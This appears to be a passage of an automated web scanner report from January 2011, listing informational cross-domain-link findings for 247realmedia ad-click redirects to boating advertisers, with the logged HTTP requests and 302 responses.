20.267. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.268. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.269. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.270. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.271. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:08:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.272. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.273. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.274. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:56:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.275. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.276. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.277. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.278. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.279. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.280. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
